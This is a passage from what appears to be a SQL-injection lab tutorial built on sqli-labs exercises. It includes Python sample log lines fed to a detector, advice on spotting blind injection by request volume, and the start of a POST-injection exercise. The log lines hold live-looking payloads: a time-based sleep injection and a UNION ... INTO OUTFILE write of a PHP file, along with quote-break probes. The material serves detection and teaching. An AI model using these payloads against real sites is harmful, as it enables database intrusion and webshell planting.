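    f'10.0.0.5 - - {TS} "GET /Less-9/?id=1%27%20and%20if(1=1,sleep(10),0)--%20s HTTP/1.1" 200 790 "-" "{UA}"',
    f'10.0.0.5 - - {TS} "GET /Less-9/?id=1 HTTP/1.1" 200 790 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    f'10.0.0.5 - - {TS} "GET /Less-2/?id=-1%20union%20select%201,2,%27x%27%20into%20outfile%20%27/tmp/x.php%27%20--+ HTTP/1.1" 200 850 "-" "{UA}"',
])

if __name__ == "__main__":
    for n, fams in scan_log(SAMPLE_LOG).items():
        print(n, fams)
```

A blind-injection session like the Less-7 script shows up as hundreds of requests that differ only in the substring position and candidate character, so counting boolean-blind hits per source address over a short window is a stronger signal than any single line.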
# Less-11: POST injection

```mysql
uname=ele'&passwd=paswd&submit=Submit # error
uname=ele&passwd=paswd&submit=Submit # login fails
```